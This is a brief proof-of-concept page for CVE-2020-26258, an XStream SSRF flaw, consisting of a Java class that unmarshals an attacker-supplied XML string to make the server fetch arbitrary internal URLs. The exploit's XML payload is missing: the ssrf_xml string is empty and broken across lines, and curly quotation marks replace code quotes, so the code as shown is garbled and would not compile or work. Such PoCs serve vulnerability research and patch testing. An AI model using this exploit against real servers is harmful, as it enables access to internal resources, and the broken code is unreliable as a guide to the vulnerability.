CVE-2020-26258 XStream SSRF

# CVE-2020-26258 XStream SSRF

PoC：

“`

XStream xstream = new XStream();
xstream.fromXML(xml);
“`

**CVE_2020_26258.java**

“`java
import com.thoughtworks.xstream.XStream;

/*
CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling
with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.

All versions until and including version 1.4.14

https://x-stream.github.io/CVE-2020-26258.html

Security framework of XStream not explicitly initialized, using predefined black list on your own risk.

*/

public class CVE_2020_26258 {
public static void main(String[] args) {
String ssrf_xml = “

“;

XStream xstream = new XStream();
xstream.fromXML(ssrf_xml);

}
}
“`

ref：

https://raw.githubusercontent.com/jas502n/CVE-2020-26259/main/CVE_2020_26258.java